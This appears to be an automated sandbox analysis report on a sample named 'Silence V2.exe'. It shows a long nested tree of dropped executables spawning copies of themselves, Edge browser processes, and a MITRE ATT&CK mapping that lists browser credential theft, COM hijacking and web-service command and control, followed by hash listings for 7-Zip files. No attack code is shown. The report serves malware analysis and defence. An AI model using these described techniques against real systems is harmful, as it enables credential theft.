        Checks computer location settings
        Executes dropped EXE
        
        PID:2640
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4688
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:508
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1716
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2848
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:388
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        13⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4776
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        15⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4004
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:464
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        17⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        18⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1200
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        19⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:396
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        20⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3744
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        21⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2524
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        22⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:976
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        23⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1172
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        24⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1840
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        25⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2760
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        26⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5020
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        27⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3904
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        28⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2036
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        29⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3920
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        30⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2624
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        31⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2820
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        32⤵
        Checks computer location settings
        
        PID:4724
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        33⤵
        Checks computer location settings
        
        PID:2708
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        34⤵
        Checks computer location settings
        
        PID:2248
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        35⤵
        Checks computer location settings
        
        PID:436
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        36⤵
        Checks computer location settings
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        37⤵
        Checks computer location settings
        
        PID:5060
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        38⤵
        Checks computer location settings
        
        PID:2364
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        39⤵
        Checks computer location settings
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        40⤵
        Checks computer location settings
        
        PID:4004
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        41⤵
        Checks computer location settings
        
        PID:2704
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        42⤵
        Checks computer location settings
        
        PID:4532
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        43⤵
        Checks computer location settings
        
        PID:2920
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        44⤵
        Checks computer location settings
        
        PID:2364
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        45⤵
        Checks computer location settings
        
        PID:740
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        46⤵
        Checks computer location settings
        
        PID:5204
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        47⤵
        Checks computer location settings
        
        PID:5316
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        48⤵
        Checks computer location settings
        
        PID:5464
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        49⤵
        Checks computer location settings
        
        PID:5568
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        50⤵
        Checks computer location settings
        
        PID:5684
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        51⤵
        
        PID:5796
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        51⤵
        
        PID:5820
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        50⤵
        
        PID:5708
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        49⤵
        
        PID:5592
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        48⤵
        
        PID:5488
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        47⤵
        
        PID:5340
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        46⤵
        
        PID:5220
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        45⤵
        
        PID:3096
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        44⤵
        
        PID:1516
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        43⤵
        
        PID:2704
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        42⤵
        
        PID:528
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        41⤵
        
        PID:4084
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        40⤵
        
        PID:2628
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        39⤵
        
        PID:4692
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        38⤵
        
        PID:5032
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        37⤵
        
        PID:4724
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        36⤵
        
        PID:2908
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        35⤵
        
        PID:4520
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        34⤵
        
        PID:1612
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        33⤵
        
        PID:4872
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        32⤵
        
        PID:4556
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        31⤵
        
        PID:4560
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        30⤵
        Executes dropped EXE
        
        PID:2296
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        29⤵
        Executes dropped EXE
        
        PID:3880
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        28⤵
        Executes dropped EXE
        
        PID:3076
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        27⤵
        Executes dropped EXE
        
        PID:692
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        26⤵
        Executes dropped EXE
        
        PID:1144
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        25⤵
        Executes dropped EXE
        
        PID:5036
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        24⤵
        Executes dropped EXE
        
        PID:2648
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        23⤵
        Executes dropped EXE
        
        PID:392
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        22⤵
        Executes dropped EXE
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        21⤵
        Executes dropped EXE
        
        PID:2008
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        20⤵
        Executes dropped EXE
        
        PID:4388
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        19⤵
        Executes dropped EXE
        
        PID:4244
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        18⤵
        Executes dropped EXE
        
        PID:4048
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        17⤵
        Executes dropped EXE
        
        PID:3180
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        16⤵
        Executes dropped EXE
        
        PID:4488
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        15⤵
        Executes dropped EXE
        
        PID:2624
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        14⤵
        Executes dropped EXE
        
        PID:1396
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        13⤵
        Executes dropped EXE
        
        PID:3356
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        12⤵
        Executes dropped EXE
        
        PID:4720
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        11⤵
        Executes dropped EXE
        
        PID:928
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        10⤵
        Executes dropped EXE
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        9⤵
        Executes dropped EXE
        
        PID:1280
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        8⤵
        Executes dropped EXE
        
        PID:4248
        
        C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        7⤵
        Executes dropped EXE
        
        PID:2068
      - C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        6⤵
        Executes dropped EXE
        
        PID:1096
    - - C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
        5⤵
        Executes dropped EXE
        
        PID:3840
  - - C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
      "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
      4⤵
      Executes dropped EXE
      PID:2708
- - C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe
    "C:\Users\Admin\AppData\Local\Temp\Silence-v2.exe"
    3⤵
    - Executes dropped EXE
    PID:3388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:3316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd330746f8,0x7ffd33074708,0x7ffd33074718
  2⤵
  PID:4876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,10214220070526049390,16914312851930726320,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
  2⤵
  PID:4768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2000,10214220070526049390,16914312851930726320,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2456 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2000,10214220070526049390,16914312851930726320,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:8
  2⤵
  PID:460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,10214220070526049390,16914312851930726320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
  2⤵
  PID:4080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,10214220070526049390,16914312851930726320,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
  2⤵
  PID:3848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,10214220070526049390,16914312851930726320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4368 /prefetch:1
  2⤵
  PID:964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,10214220070526049390,16914312851930726320,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:1
  2⤵
  PID:3608
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2000,10214220070526049390,16914312851930726320,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2792 /prefetch:8
  2⤵
  PID:2604
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2000,10214220070526049390,16914312851930726320,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2792 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,10214220070526049390,16914312851930726320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
  2⤵
  PID:4612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,10214220070526049390,16914312851930726320,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
  2⤵
  PID:2704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,10214220070526049390,16914312851930726320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
  2⤵
  PID:880

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5036

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3004

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Privilege Escalation

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\7-Zip\7-zip.chm

Filesize
121KB

MD5
a7ba50e8a23bf4a17f827c69bdb8f6ab

SHA1
17db88d7fa4bdb042897cf1b8a8d6620dc4f3b07

SHA256
94561a6dd2e91b42d566846270b9d8915c30dd9200e7aab3a4e37547c0042491

SHA512
16598f7fe5dbad5abac11bbf84fce5a26dd686c1786ddeea7b86ea239fd1fd06587755eee7d376f4ca01a0c61f8b8babf5928222009160949a332fe5e985964a

Download Submit
C:\Program Files\7-Zip\7-zip.dll

Filesize
99KB

MD5
88518dec90d627d9d455d8159cf660c5

SHA1
e13c305d35385e5fb7f6d95bb457b944a1d5a2ca

SHA256
f39996ab8eabdffe4f9a22abb1a97665816ec77b64440e0a20a80a41f0810ced

SHA512
7c9d7bd455064d09307d42935c57de687764cf77d3c9ba417c448f4f2c4b87bcd6fea66354dfe80842a2fa3f96c81cc25e8bf77307b4ace1bbe1346cbe68435f

Download Submit
C:\Program Files\7-Zip\7zFM.exe

Filesize
967KB

MD5
4eaae49d718451ec5442d4c8ef42b88b

SHA1
bbac4f5d69a0a778db567e6978d4dabf2d763167

SHA256
dc4fdcd96efe7b41e123c4cba19059162b08449627d908570b534e7d6ec7bf58

SHA512
41595b67c8506c054c28ce2b5dec9d304651449464c6e1eb092a049d49326594584900cff4e9b8210ca3ad8a23e9c22d8df1ae8af15f44a69f784cc546fcced3

Download Submit
C:\Program Files\7-Zip\History.txt

Filesize
8KB

MD5
ccad44b829868fc155d11387f09c4f4b

SHA1
980dc6ceffd5c852f117034da08e14a34a36897b

SHA256
7d6a3d181b5166ffe08f2779903edd2749c3ef78fd3c0174bdc4380f4a7511b8

SHA512
97a0b4ad774a5ea008c67acd094e4c09261f759f82878f770d90d9fa63d2c283e231249815d6fca7fc12690edc55cdad76720125a403a3aa9237493ef0de942f

Download Submit
C:\Program Files\7-Zip\Lang\af.txt

Filesize
4KB

MD5
df216fae5b13d3c3afe87e405fd34b97

SHA1
787ccb4e18fc2f12a6528adbb7d428397fc4678a

SHA256
9cf684ea88ea5a479f510750e4089aee60bbb2452aa85285312bafcc02c10a34

SHA512
a6eee3d60b88f9676200b40ca9c44cc4e64cf555d9b8788d4fde05e05b8ca5da1d2c7a72114a18358829858d10f2beff094afd3bc12b370460800040537cff68

Download Submit
C:\Program Files\7-Zip\Lang\an.txt

Filesize
7KB

MD5
f16218139e027338a16c3199091d0600

SHA1
da48140a4c033eea217e97118f595394195a15d5

SHA256
3ab9f7aacd38c4cde814f86bc37eec2b9df8d0dddb95fc1d09a5f5bcb11f0eeb

SHA512
b2e99d70d1a7a2a1bfa2ffb61f3ca2d1b18591c4707e4c6c5efb9becdd205d646b3baa0e8cbd28ce297d7830d3dfb8f737266c66e53a83bdbe58b117f8e3ae14

Download Submit
C:\Program Files\7-Zip\Lang\ar.txt

Filesize
12KB

MD5
5747381dc970306051432b18fb2236f2

SHA1
20c65850073308e498b63e5937af68b2e21c66f3

SHA256
85a26c7b59d6d9932f71518ccd03eceeba42043cb1707719b72bfc348c1c1d72

SHA512
3306e15b2c9bb2751b626f6f726de0bcafdc41487ba11fabfcef0a6a798572b29f2ee95384ff347b3b83b310444aaeec23e12bb3ddd7567222a0dd275b0180ff

Download Submit
C:\Program Files\7-Zip\Lang\ast.txt

Filesize
4KB

MD5
1cf6411ff9154a34afb512901ba3ee02

SHA1
958f7ff322475f16ca44728349934bc2f7309423

SHA256
f5f2174daf36e65790c7f0e9a4496b12e14816dad2ee5b1d48a52307076be35f

SHA512
b554c1ab165a6344982533cceed316d7f73b5b94ce483b5dc6fb1f492c6b1914773027d31c35d60ab9408669520ea0785dc0d934d3b2eb4d78570ff7ccbfcf9c

Download Submit
C:\Program Files\7-Zip\Lang\az.txt

Filesize
10KB

MD5
9cd3a23ca6f66f570607f63be6aa0001

SHA1
912837c29c0e07470e257c21775b7513e9af4475

SHA256
1da941116e20e69f61a4a68481797e302c11fcf462ca7203a565588b26011615

SHA512
c90ead15096009b626b06f9eae1b004f4adba5d18ccdb5c7d92694d36903760541f8aa7352be96466f2b0775c69f850605988fa4ef86f3de4fca34f7b645457e

Download Submit
C:\Program Files\7-Zip\Lang\ba.txt

Filesize
10KB

MD5
387ff78cf5f524fc44640f3025746145

SHA1
8480e549d00003de262b54bc342af66049c43d3b

SHA256
8a85c3fcb5f81157490971ee4f5e6b9e4f80be69a802ebed04e6724ce859713f

SHA512
